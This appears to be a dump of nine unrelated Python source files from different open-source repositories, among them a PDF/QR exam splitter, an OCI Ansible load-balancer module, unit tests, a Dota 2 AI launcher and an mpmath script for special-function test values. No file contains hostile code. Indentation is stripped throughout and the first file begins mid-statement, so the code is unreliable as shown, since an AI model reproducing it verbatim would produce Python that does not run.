page_count = 1
prev_file = data = "BLANK"
output = {"filename": filename, "is_qr": True, "use_ocr": use_ocr}
json_file = os.path.join(split_path, "decoded.json")
for page_number in range(pdfPages.numPages):
# convert pdf to series of images for scanning
page = convert_from_bytes(
open(filename, 'rb').read(),
first_page=page_number+1, last_page=page_number+2)[0]
# increase contrast of image for better QR decoding
cv_img = numpy.array(page)
img_grey = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY)
ret2, thresh = cv2.threshold(img_grey, 0, 255,
cv2.THRESH_BINARY+cv2.THRESH_OTSU)
# decode img - only look for QR codes
val = pyzbar.decode(thresh, symbols=[ZBarSymbol.QRCODE])
if val != []:
# found a new qr code, split here
# convert byte literal to string
data = val[0][0].decode("utf-8")
if not use_ocr:
buff += "Found a QR code with value \'" + data + "\' on"
buff += " page " + str(page_number) + ", "
if data == "none": # blank exam with 'none' qr code
data = "BLANK EXAM"
else:
pre = data[0:len(qr_prefix)]
suf = data[(len(data)-len(qr_suffix)):len(data)]
if qr_prefix != '' and pre == qr_prefix:
data = data[len(qr_prefix):]
if qr_suffix != '' and suf == qr_suffix:
data = data[:-len(qr_suffix)]
# since QR splitting doesn't know the max page assume length of 3
prepended_index = str(i).zfill(3)
cover_filename = '{}_{}_cover.pdf'.format(filename[:-4],
prepended_index)
output_filename = '{}_{}.pdf'.format(filename[:-4], prepended_index)
output[output_filename] = {}
# if we're looking for a student's ID, use that as the value instead
if use_ocr:
data, confidences = scanner.getDigits(thresh, val)
buff += "Found student ID number of \'" + data + "\' on"
buff += " page " + str(page_number) + ", "
buff += "Confidences: " + str(confidences) + " "
output[output_filename]["confidences"] = str(confidences)
output[output_filename]['id'] = data
# save pdf
if i != 0 and prev_file != '':
output[prev_file]['page_count'] = page_count
# update json file
logger.write_to_json(json_file, output)
with open(prev_file, 'wb') as out:
pdf_writer.write(out)
if id_index == 1:
# correct first pdf's page count and print file
output[prev_file]['page_count'] = page_count
with open(prev_file, 'wb') as out:
pdf_writer.write(out)
# start a new pdf and grab the cover
cover_writer = PdfFileWriter()
pdf_writer = PdfFileWriter()
cover_writer.addPage(pdfPages.getPage(i))
pdf_writer.addPage(pdfPages.getPage(i))
# save cover
with open(cover_filename, 'wb') as out:
cover_writer.write(out)
# save cover image
page.save('{}.jpg'.format(cover_filename[:-4]), "JPEG", quality=100)
id_index += 1
page_count = 1
prev_file = output_filename
# save page as image, start indexing at 1
page.save(prev_file[:-4] + '_' + str(page_count).zfill(3) + '.jpg',
"JPEG", quality=100)
else:
# the first pdf page doesn't have a qr code
if i == 0:
prepended_index = str(i).zfill(3)
output_filename = '{}_{}.pdf'.format(filename[:-4], prepended_index)
cover_filename = '{}_{}_cover.pdf'.format(filename[:-4],
prepended_index)
output[output_filename] = {}
# set the value as blank so a human can check what happened
output[output_filename]['id'] = "BLANK"
prev_file = output_filename
id_index += 1
cover_writer = PdfFileWriter()
# save cover
cover_writer.addPage(pdfPages.getPage(i))
with open(cover_filename, 'wb') as out:
cover_writer.write(out)
# save cover image
page.save('{}.jpg'.format(cover_filename[:-4]), "JPEG", quality=100)
# add pages to current split_pdf
page_count += 1
pdf_writer.addPage(pdfPages.getPage(i))
# save page as image, start indexing at 1
page.save(prev_file[:-4] + '_' + str(page_count).zfill(3) + '.jpg',
"JPEG", quality=100)
i += 1
buff += "Finished splitting into {} files\n".format(id_index)
# save whatever is left
prepended_index = str(i).zfill(3)
output_filename = '{}_{}.pdf'.format(filename[:-4], prepended_index)
output[prev_file]['id'] = data
output[prev_file]['page_count'] = page_count
if use_ocr:
output[prev_file]['confidences'] = str(confidences)
logger.write_to_json(json_file, output)
with open(prev_file, 'wb') as out:
pdf_writer.write(out)
# write the buffer to the log file, so everything is on one line
logger.write_to_log(log_file_path, buff)
except Exception:
msg = "Failed when splitting pdf " + filename
print(msg)
traceback.print_exc()
# print everything in the buffer just in case it didn't write
logger.write_to_log(log_file_path, buff)
logger.write_to_log(log_file_path, msg + "\n" + traceback.format_exc())
if __name__ == "__main__":
main()
|
tests/clpy_tests/random_tests/test_distributions.py
|
fixstars/clpy
| 142 |
75518
|
<filename>tests/clpy_tests/random_tests/test_distributions.py
import unittest
import clpy
from clpy.random import distributions
from clpy import testing
@testing.parameterize(*testing.product({
'shape': [(4, 3, 2), (3, 2)],
'loc_shape': [(), (3, 2)],
'scale_shape': [(), (3, 2)],
})
)
@testing.gpu
class TestDistributions(unittest.TestCase):
_multiprocess_can_split_ = True
def check_distribution(self, dist_func, loc_dtype, scale_dtype, dtype):
loc = clpy.ones(self.loc_shape, dtype=loc_dtype)
scale = clpy.ones(self.scale_shape, dtype=scale_dtype)
out = dist_func(loc, scale, self.shape, dtype)
self.assertEqual(self.shape, out.shape)
self.assertEqual(out.dtype, dtype)
@clpy.testing.for_float_dtypes('dtype', no_float16=True)
@clpy.testing.for_float_dtypes('loc_dtype')
@clpy.testing.for_float_dtypes('scale_dtype')
def test_normal(self, loc_dtype, scale_dtype, dtype):
self.check_distribution(distributions.normal,
loc_dtype, scale_dtype, dtype)
|
test/Driver/Dependencies/Inputs/fake-build-for-bitcode.py
|
AbdouSarr/swift
| 825 |
75523
|
#!/usr/bin/env python
# fake-build-for-bitcode.py - Fake build with -embed-bitcode -*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See http://swift.org/LICENSE.txt for license information
# See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
#
# Emulates the frontend of an -embed-bitcode job. That means we have to handle
# -emit-bc and -c actions.
#
# ----------------------------------------------------------------------------
from __future__ import print_function
import os
import sys
assert sys.argv[1] == '-frontend'
primaryFile = sys.argv[sys.argv.index('-primary-file') + 1]
outputFile = sys.argv[sys.argv.index('-o') + 1]
# Update the output file mtime, or create it if necessary.
# From http://stackoverflow.com/a/1160227.
with open(outputFile, 'a'):
os.utime(outputFile, None)
if '-emit-bc' in sys.argv:
print("Handled", os.path.basename(primaryFile))
elif '-c' in sys.argv:
print("Produced", os.path.basename(outputFile))
else:
assert False, "unknown action"
|
library/oci_load_balancer_backend.py
|
slmjy/oci-ansible-modules
| 106 |
75527
|
#!/usr/bin/python
# Copyright (c) 2018, Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_load_balancer_backend
short_description: Add, modify and remove a backend from a load balancer in
OCI Load Balancing Service
description:
- Add a Backend server to OCI Load Balancer
- Update a Backend server in a Load Balancer, if present, with any changed attribute
- Delete a Backend server from OCI Load Balancer Backends, if present.
version_added: "2.5"
options:
load_balancer_id:
description: Identifier of the Load Balancer in which the Backend belongs.
required: true
aliases: ['id']
backend_set_name:
description: The name of the backend set to add the backend server to.
required: true
ip_address:
description: The IP address of the backend server.
required: true
port:
description: The communication port for the backend server.
required: true
backup:
description: Whether the load balancer should treat this server as a backup unit. If true, the load balancer
forwards no ingress traffic to this backend server unless all other backend servers not marked as
"backup" fail the health check policy.
required: false
default: False
type: bool
drain:
description: Whether the load balancer should drain this server. Servers marked "drain" receive no new incoming
traffic.
required: false
default: False
type: bool
offline:
description: Whether the load balancer should treat this server as offline. Offline servers receive no incoming
traffic.
required: false
default: False
type: bool
state:
description: Create,update or delete Load Balancer Backend. For I(state=present),
if it does not exists, it gets added. If exists, it gets updated.
required: false
default: 'present'
choices: ['present','absent']
weight:
description: The load balancing policy weight assigned to the server. Backend
servers with a higher weight receive a larger proportion of incoming
traffic. For example, a server weighted 3 receives 3 times the number
of new connections as a server weighted 1.
required: false
author:
- "<NAME>(@debayan_gupta)"
extends_documentation_fragment: [oracle, oracle_wait_options]
"""
EXAMPLES = """
# Note: These examples do not set authentication details.
# Create Load Balancer Backend
- name: Create Load Balancer Backend
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
backup: False
drain: False
offline: False
weight: 3
state: 'present'
# Update a Backend server by enabling drain
- name: Drain a backend server by updating the Backend and setting the 'drain' option
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
drain: True
state: 'present'
# Update a Backend server to make it offline
- name: Make a backend server offline
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
offline: True
state: 'present'
# Update a Backend server to backup state
- name: Change a backend server state as backup
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
backup: True
state: 'present'
# Update Load Balancer Backend
- name: Update Load Balancer Backend
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
backup: True
state: 'present'
# Delete Load Balancer Backend
- name: Update Load Balancer Backend
oci_load_balancer_backend:
load_balancer_id: "ocid1.loadbalancer.oc1.iad.xxxxxEXAMPLExxxxx"
backend_set_name: "backend1"
ip_address: "10.50.121.69"
port: 8080
state: 'absent'
"""
RETURN = """
backend:
description: Attributes of the created/updated Load Balancer Backend.
For delete, deleted Load Balancer Backend description will
be returned.
returned: success
type: complex
contains:
name:
description: Name of the Load Balancer Backend
returned: always
type: string
sample: 10.45.121.59:8080
ip_address:
description: Ip Address of the Load Balancer Backend
returned: always
type: string
sample: 10.45.121.69
port:
description: Port of the Load Balancer Backend
returned: always
type: string
sample: 8080
backup:
description: The backup state of the Load Balancer Backend
returned: always
type: boolean
sample: False
drain:
description: The drain state of the Load Balancer Backend
returned: always
type: boolean
sample: False
offline:
description: The offline state of the Load Balancer Backend
returned: always
type: boolean
sample: False
weight:
description: The weight of the Load Balancer Backend
returned: always
type: integer
sample: 1
sample: {
"backup": false,
"drain": false,
"ip_address": "10.159.34.21",
"name":"10.159.34.21:8181",
"offline":false,
"port":8181,
"weight":3
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.oracle import oci_utils, oci_lb_utils
try:
from oci.load_balancer.load_balancer_client import LoadBalancerClient
from oci.exceptions import ServiceError, ClientError
from oci.util import to_dict
from oci.load_balancer.models import UpdateBackendDetails, CreateBackendDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
logger = None
def create_or_update_backend(lb_client, module):
backend = None
result = dict(changed=False, backend="")
lb_id = module.params.get("load_balancer_id")
backend_set_name = module.params.get("backend_set_name")
backend = oci_utils.get_existing_resource(
lb_client.get_backend,
module,
load_balancer_id=lb_id,
backend_set_name=backend_set_name,
backend_name=oci_lb_utils.get_backend_name(module),
)
try:
if backend:
result = update_backend(lb_client, module, backend, lb_id, backend_set_name)
else:
result = oci_utils.check_and_create_resource(
resource_type="backend",
create_fn=create_backend,
kwargs_create={
"lb_client": lb_client,
"module": module,
"lb_id": lb_id,
"backend_set_name": backend_set_name,
},
list_fn=lb_client.list_backends,
kwargs_list={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
},
module=module,
model=CreateBackendDetails(),
)
except ServiceError as ex:
get_logger().error("Unable to create/update backend due to: %s", ex.message)
module.fail_json(msg=ex.message)
except ClientError as ex:
get_logger().error("Unable to create/update backend due to: %s", str(ex))
module.fail_json(msg=str(ex))
return result
def create_backend(lb_client, module, lb_id, backend_set_name):
backend_name = oci_lb_utils.get_backend_name(module)
create_backend_details = CreateBackendDetails()
for attribute in create_backend_details.attribute_map:
create_backend_details.__setattr__(
attribute, module.params.get(attribute, None)
)
get_logger().info(
"Creating backend for backendset %s with parameters %s",
backend_set_name,
str(create_backend_details),
)
get_logger().debug(
"backend ip_address: %s and port: %s",
module.params["ip_address"],
str(module.params["port"]),
)
result = oci_lb_utils.create_or_update_lb_resources_and_wait(
resource_type="backend",
function=lb_client.create_backend,
kwargs_function={
"create_backend_details": create_backend_details,
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
},
lb_client=lb_client,
get_fn=lb_client.get_backend,
kwargs_get={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
module=module,
)
get_logger().info(
"Successfully created backend for backendset %s with parameters %s",
backend_set_name,
str(create_backend_details),
)
return result
def update_backend(lb_client, module, backend, lb_id, backend_set_name):
changed = False
result = dict(changed=changed, backend=to_dict(backend))
backend_name = oci_lb_utils.get_backend_name(module)
get_logger().info(
"Updating backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
update_backend_details = UpdateBackendDetails()
for attribute in update_backend_details.attribute_map:
changed = oci_utils.check_and_update_attributes(
update_backend_details,
attribute,
module.params.get(attribute, None),
getattr(backend, attribute),
changed,
)
get_logger().debug(
"Existing backend property values: %s, input property values: %s",
backend,
update_backend_details,
)
if changed:
result = oci_lb_utils.create_or_update_lb_resources_and_wait(
resource_type="backend",
function=lb_client.update_backend,
kwargs_function={
"update_backend_details": update_backend_details,
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
lb_client=lb_client,
get_fn=lb_client.get_backend,
kwargs_get={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
module=module,
)
get_logger().info(
"Successfully updated backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
else:
get_logger().info(
"No update to the backend %s for backendset %s in load balancer %s as no "
+ "attribute changed",
backend_name,
backend_set_name,
lb_id,
)
return result
def delete_backend(lb_client, module):
lb_id = module.params.get("load_balancer_id")
backend_set_name = module.params.get("backend_set_name")
backend_name = oci_lb_utils.get_backend_name(module)
get_logger().info(
"Deleting backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
result = oci_lb_utils.delete_lb_resources_and_wait(
resource_type="backend",
function=lb_client.delete_backend,
kwargs_function={
"backend_set_name": backend_set_name,
"load_balancer_id": lb_id,
"backend_name": backend_name,
},
lb_client=lb_client,
get_fn=lb_client.get_backend,
kwargs_get={
"load_balancer_id": lb_id,
"backend_set_name": backend_set_name,
"backend_name": backend_name,
},
module=module,
)
get_logger().info(
"Successfully Deleted backend %s for backendset %s in load balancer %s",
backend_name,
backend_set_name,
lb_id,
)
return result
def set_logger(input_logger):
global logger
logger = input_logger
def get_logger():
return logger
def main():
logger = oci_utils.get_logger("oci_load_balancer_backend")
set_logger(logger)
module_args = oci_utils.get_common_arg_spec(supports_wait=True)
module_args.update(
dict(
load_balancer_id=dict(type="str", required=True, aliases=["id"]),
backend_set_name=dict(type="str", required=True),
backup=dict(type="bool", required=False),
ip_address=dict(type="str", required=True),
drain=dict(type="bool", required=False),
state=dict(
type="str",
required=False,
default="present",
choices=["present", "absent"],
),
offline=dict(type="bool", required=False),
port=dict(type="int", required=True),
weight=dict(type="int", required=False),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module")
lb_client = oci_utils.create_service_client(module, LoadBalancerClient)
state = module.params["state"]
if state == "present":
result = create_or_update_backend(lb_client, module)
elif state == "absent":
result = delete_backend(lb_client, module)
module.exit_json(**result)
if __name__ == "__main__":
main()
|
heat/db/sqlalchemy/migrate_repo/versions/080_resource_attrs_data.py
|
noironetworks/heat
| 265 |
75543
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from migrate.changeset import constraint
import sqlalchemy
def upgrade(migrate_engine):
meta = sqlalchemy.MetaData(bind=migrate_engine)
resource = sqlalchemy.Table('resource', meta, autoload=True)
resource_properties_data = sqlalchemy.Table('resource_properties_data',
meta, autoload=True)
attr_data_id = sqlalchemy.Column('attr_data_id',
sqlalchemy.Integer)
attr_data_id.create(resource)
res_fkey = constraint.ForeignKeyConstraint(
columns=[resource.c.attr_data_id],
refcolumns=[resource_properties_data.c.id],
name='rsrc_attr_data_ref')
res_fkey.create()
|
tests/test_dict.py
|
fakegit/pydu
| 229 |
75545
|
import pytest
import unittest
from pydu.dict import AttrDict, LookupDict, CaseInsensitiveDict, OrderedDefaultDict, attrify
class TestAttrDict:
def test_attr_access_with_init(self):
d = AttrDict(key=1)
assert d['key'] == 1
assert d.key == 1
def test_attr_access_without_init(self):
d = AttrDict()
d['key'] = 1
assert d['key'] == 1
assert d.key == 1
d.anotherkey = 1
assert d.anotherkey == 1
assert d['anotherkey'] == 1
def test_attr_delete(self):
d = AttrDict(key=1)
del d.key
with pytest.raises(AttributeError):
del d.key
def test_repr(self):
d = AttrDict()
assert repr(d) == '<AttrDict {}>'
class TestLooUpDict:
def test_key_exist(self):
d = LookupDict()
d['key'] = 1
assert d['key'] == 1
def test_key_not_exist(self):
d = LookupDict()
assert d['key'] is None
class TestCaseInsensitiveDict(unittest.TestCase):
def setUp(self):
self.d = CaseInsensitiveDict()
self.d['Accept'] = 1
def test_ci_dict_set(self):
assert self.d['aCCept'] == 1
assert list(self.d) == ['Accept']
def test_ci_dict_del(self):
del self.d['accept']
assert not self.d
def test_ci_dict_copy_and_equal(self):
d = self.d.copy()
assert d == self.d
class TestOrderedDefaultDict:
def test_default_normal(self):
d = OrderedDefaultDict(int)
assert d[1] == 0
assert d['a'] == 0
d[2] = 2
assert d[2] == 2
assert list(d.keys()) == [1, 'a', 2]
d = OrderedDefaultDict(int, a=1)
assert d['a'] == 1
def test_default_factory_not_callable(self):
with pytest.raises(TypeError):
OrderedDefaultDict('notcallable')
def test_default_factory_none(self):
d = OrderedDefaultDict()
with pytest.raises(KeyError):
d[1]
def test_copy(self):
d1 = OrderedDefaultDict(int, a=[])
d2 = d1.copy()
assert d2['a'] == []
d1['a'].append(1)
assert d2['a'] == [1]
def test_deepcopy(self):
import copy
d1 = OrderedDefaultDict(int, a=[])
d2 = copy.deepcopy(d1)
assert d2['a'] == []
d1['a'].append(1)
assert d2['a'] == []
def test_repr(self):
d = OrderedDefaultDict(int, a=1)
assert repr(d).startswith('OrderedDefaultDict')
def test_attrify():
attrd = attrify({
'a': [1, 2, {'b': 'b'}],
'c': 'c',
})
assert attrd.a == [1, 2, {'b': 'b'}]
assert attrd.a[2].b == 'b'
assert attrd.c == 'c'
attrd = attrify((1, 2))
assert attrd == (1, 2)
attrd = attrify({
'a': 1,
'b': (1, 2)
})
assert attrd.a == 1
assert attrd.b == (1, 2)
|
play_with_human_local.py
|
Andrea-MariaDB-2/LastOrder-Dota2
| 332 |
75549
|
<gh_stars>100-1000
from gym_env.dota_game import DotaGame, TEAM_RADIANT, TEAM_DIRE
from dotaservice.protos.dota_shared_enums_pb2 import DOTA_GAMEMODE_1V1MID
from agents.dota_agent import PPOAgent
from multiprocessing import Process
from sys import platform
import time
import os
import pathlib
# path example
DOTA_CLINET_PATH_MAC = "~/Library/Application Support/Steam/steamapps/common/dota 2 beta/game"
DOTA_CLINET_PATH_WINDOWS = r'E:\SteamLibrary\steamapps\common\dota 2 beta\game'
DOTA_CLINET_PATH_LINUX = "~/.steam/steam/steamapps/common/dota 2 beta/game"
TMP_PATH_WINDOWS = str(pathlib.Path(__file__).parent.resolve()) + r'\tmp'
LAST_ORDER_PROJECT_PATH_MAC = pathlib.Path(__file__).parent.resolve()
LAST_ORDER_PROJECT_PATH_WINDOWS = pathlib.Path(__file__).parent.resolve()
LAST_ORDER_PROJECT_PATH_LINUX = pathlib.Path(__file__).parent.resolve()
print(LAST_ORDER_PROJECT_PATH_WINDOWS)
def dota_process_exists():
if platform == 'win32':
return len(os.popen("tasklist /v | findstr dota2.exe").read()) != 0
else:
return len(os.popen("ps aux | grep dota2 | grep -v grep").read()) != 0
def run_human_vs_ai(dota_game: DotaGame, team_id: int, player_id: int, opponent_player_id: int):
if platform == 'darwin':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_MAC
elif platform == 'win32':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_WINDOWS
else:
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_LINUX
agent = PPOAgent(
dota_game,
team_id,
player_id,
opponent_player_id,
"",
"self_eval",
)
agent.run()
def run_dota():
dota_game = DotaGame(host_timescale=1, ticks_per_observation=6, game_mode=DOTA_GAMEMODE_1V1MID, host_mode="HOST_MODE_GUI_MENU")
if platform == 'darwin':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_MAC
elif platform == 'win32':
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_WINDOWS
else:
dota_game.session_folder = LAST_ORDER_PROJECT_PATH_LINUX
try:
dota_game.stop_dota_pids()
dota_game.run_dota()
time.sleep(10)
except Exception as e:
print(e)
dota_game.stop_dota_pids()
def supervisor():
while True:
if not dota_process_exists():
Process(target=run_dota).run()
dota_game = DotaGame(host_timescale=1, ticks_per_observation=6, game_mode=DOTA_GAMEMODE_1V1MID, host_mode="HOST_MODE_GUI_MENU")
dp = Process(target=run_human_vs_ai, args=(dota_game, TEAM_RADIANT, 1, 0))
dp.start()
time.sleep(20)
if __name__ == "__main__":
supervisor()
|
python_toolbox/caching/decorators.py
|
hboshnak/python_toolbox
| 119 |
75558
|
# Copyright 2009-2017 <NAME>.
# This program is distributed under the MIT license.
'''
Defines the `cache` decorator.
See its documentation for more details.
'''
# todo: examine thread-safety
import datetime as datetime_module
from python_toolbox import misc_tools
from python_toolbox import binary_search
from python_toolbox import decorator_tools
from python_toolbox.sleek_reffing import SleekCallArgs
from python_toolbox.third_party.decorator import decorator as decorator_
infinity = float('inf')
class CLEAR_ENTIRE_CACHE(misc_tools.NonInstantiable):
'''Sentinel object for clearing the entire cache.'''
def _get_now():
'''
Get the current datetime.
This is specified as a function to make testing easier.
'''
return datetime_module.datetime.now()
@decorator_tools.helpful_decorator_builder
def cache(max_size=infinity, time_to_keep=None):
'''
Cache a function, saving results so they won't have to be computed again.
This decorator understands function arguments. For example, it understands
that for a function like this:
@cache()
def f(a, b=2):
return whatever
The calls `f(1)` or `f(1, 2)` or `f(b=2, a=1)` are all identical, and a
cached result saved for one of these calls will be used for the others.
All the arguments are sleekreffed to prevent memory leaks. Sleekref is a
variation of weakref. Sleekref is when you try to weakref an object, but if
it's non-weakreffable, like a `list` or a `dict`, you maintain a normal,
strong reference to it. (See documentation of
`python_toolbox.sleek_reffing` for more details.) Thanks to sleekreffing
you can avoid memory leaks when using weakreffable arguments, but if you
ever want to use non-weakreffable arguments you are still able to.
(Assuming you don't mind the memory leaks.)
You may optionally specify a `max_size` for maximum number of cached
results to store; old entries are thrown away according to a
least-recently-used alogrithm. (Often abbreivated LRU.)
You may optionally specific a `time_to_keep`, which is a time period after
which a cache entry will expire. (Pass in either a `timedelta` object or
keyword arguments to create one.)
'''
# todo idea: figure how how complex the function's argspec is, and then
# compile a function accordingly, so functions with a simple argspec won't
# have to go through so much shit. update: probably it will help only for
# completely argumentless function. so do one for those.
from python_toolbox.nifty_collections import OrderedDict
if time_to_keep is not None:
if max_size != infinity:
raise NotImplementedError
if not isinstance(time_to_keep, datetime_module.timedelta):
try:
time_to_keep = datetime_module.timedelta(**time_to_keep)
except Exception as exception:
raise TypeError(
'`time_limit` must be either a `timedelta` object or a '
'dict of keyword arguments for constructing a '
'`timedelta` object.'
) from exception
assert isinstance(time_to_keep, datetime_module.timedelta)
def decorator(function):
# In case we're being given a function that is already cached:
if getattr(function, 'is_cached', False): return function
if max_size == infinity:
if time_to_keep:
sorting_key_function = lambda sleek_call_args: \
cached._cache[sleek_call_args][1]
def remove_expired_entries():
almost_cutting_point = \
binary_search.binary_search_by_index(
list(cached._cache.keys()),
_get_now(),
sorting_key_function,
rounding=binary_search.LOW
)
if almost_cutting_point is not None:
cutting_point = almost_cutting_point + 1
for key in list(cached._cache.keys())[:cutting_point]:
del cached._cache[key]
@misc_tools.set_attributes(_cache=OrderedDict())
def cached(function, *args, **kwargs):
remove_expired_entries()
sleek_call_args = \
SleekCallArgs(cached._cache, function, *args, **kwargs)
try:
return cached._cache[sleek_call_args][0]
except KeyError:
value = function(*args, **kwargs)
cached._cache[sleek_call_args] = (
value,
_get_now() + time_to_keep
)
cached._cache.sort(key=sorting_key_function)
return value
else: # not time_to_keep
@misc_tools.set_attributes(_cache={})
def cached(function, *args, **kwargs):
sleek_call_args = \
SleekCallArgs(cached._cache, function, *args, **kwargs)
try:
return cached._cache[sleek_call_args]
except KeyError:
cached._cache[sleek_call_args] = value = \
function(*args, **kwargs)
return value
else: # max_size < infinity
@misc_tools.set_attributes(_cache=OrderedDict())
def cached(function, *args, **kwargs):
sleek_call_args = \
SleekCallArgs(cached._cache, function, *args, **kwargs)
try:
result = cached._cache[sleek_call_args]
cached._cache.move_to_end(sleek_call_args)
return result
except KeyError:
cached._cache[sleek_call_args] = value = \
function(*args, **kwargs)
if len(cached._cache) > max_size:
cached._cache.popitem(last=False)
return value
result = decorator_(cached, function)
def cache_clear(key=CLEAR_ENTIRE_CACHE):
if key is CLEAR_ENTIRE_CACHE:
cached._cache.clear()
else:
try:
del cached._cache[key]
except KeyError:
pass
result.cache_clear = cache_clear
result.is_cached = True
return result
return decorator
|
src/Tools/PythonScripts/ComputeSpecialFunctionsTestValues.py
|
MyIntelligenceAgency/infer
| 1,416 |
75568
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
"""A script to evaluate test values for special functions in high precision.
This scripts looks for .csv files in /test/Tests/Data/SpecialFunctionsValues.
These files are expected to contain sets of arguments and expected result values
for some special functions.
Whenever the script encounters a file for which it has a defined function,
it evaluates that function for every set of arguments present in that file
and replaces the expected result in the file with the one it computed,
except for Infinite or NaN results, which are preserved.
.csv files are expected to have the header of the form
arg0,arg1,...,argN,expectedresult
use comma as a value separator, dot as a decimal separator, and
"Infinity", "-Infinity", and "NaN" to designate the corresponding values.
The correspondence between file names and functions is set in the pair_info
dictionary within the script.
To add a new test case, add a new row to the csv file using zero for the expectedresult.
Then run this script to replace the dummy value.
"""
from __future__ import division
import os
import csv
from mpmath import *
import time
mp.pretty = True
mp.dps = 500
output_dps = 50
def normal_cdf_moment_ratio(n, x):
if x < 0:
return power(2, -0.5 - n / 2) * hyperu(n / 2 + 0.5, 0.5, x * x / 2)
return exp(x * x / 4) * pcfu(0.5 + n, -x)
def normal_cdf2(x, y, r):
"""
This function produces correct results for inputs currently present in /test/Tests/Data/SpecialFunctionsValues.
Other inputs may fall into areas where currently present algorithms produce incorrect results and may require modifying this function.
"""
if x == -inf or y == -inf:
return mpf('0')
if x == inf:
return ncdf(y)
if y == inf:
return ncdf(x)
if r == mpf('1'):
return ncdf(min(x, y))
if r == mpf('-1'):
if x <= -y:
return mpf('0')
elif x > y:
return ncdf(y) - ncdf(-x)
else:
return ncdf(x) - ncdf(-y)
if abs(y) > abs(x):
z = x
x = y
y = z
# Avoid quadrature with r < 0 since it is sometimes inaccurate.
if r < 0 and x - y < 0:
# phi(x,y,r) = phi(inf,y,r) - phi(-x,y,-r)
# phi(x,y,r) = phi(x,inf,r) - phi(x,-y,-r)
return ncdf(x) - normal_cdf2(x, -y, -r)
if x > 0 and -x + y <= 0:
return ncdf(y) - normal_cdf2(-x,y,-r)
if x + y > 0:
# phi(x,y,r) = phi(-x,-y,r) + phi(x,y,-1)
return normal_cdf2(-x, -y, r) + normal_cdf2(x,y,-1)
def f(t):
if abs(t) == mpf('1'):
# When t = -1, (x*x+y*y-2*t*x*y) = (x+y)^2 >= 0
# When t = 1, (x*x+y*y-2*t*x*y) = (x-y)^2 >= 0
return mpf('0')
omt2 = (1 - t) * (1 + t)
return 1 / (2 * pi * sqrt(omt2)) * exp(-(x * x + y * y - 2 * t * x * y) / (2 * omt2))
omr2 = (1+r)*(1-r)
ymrx = y - r*x
def f2(t):
return npdf(t - x) * normal_cdf((ymrx + r*t)/omr2)
# This integral excludes normal_cdf2(x,y,-1)
# which will be zero when x+y <= 0
result, err = safe_quad(f, [-1, r])
if mpf(10)**output_dps * abs(err) > abs(result):
result, err = safe_quad(f2, [0, inf])
if mpf(10)**output_dps * abs(err) > abs(result):
print(f"Suspiciously big error when evaluating an integral for normal_cdf2({nstr(x)}, {nstr(y)}, {nstr(r)}).")
print(f"Integral: {nstr(result)}")
print(f"Integral error estimate: {nstr(err)}")
return result
def safe_quad(f, points):
verbose=False
# get a quick estimate of the result
estimate = quad(f, points, maxdegree=1, verbose=verbose)
if verbose:
print(f"Rescaling integrand by {nstr(1/estimate)}")
result, err = quad(lambda x: f(x)/estimate, points, error=True, verbose=verbose)
result *= estimate
err *= estimate
if mpf(10)**output_dps * abs(err) > abs(result):
estimate = result
if verbose:
print(f"Rescaling integrand by {nstr(1/estimate)}")
result, err = quad(lambda x: f(x)/estimate, points, error=True, verbose=verbose)
result *= estimate
err *= estimate
return result, err
def normal_cdf2_ln(x, y, r):
return ln(normal_cdf2(x, y, r))
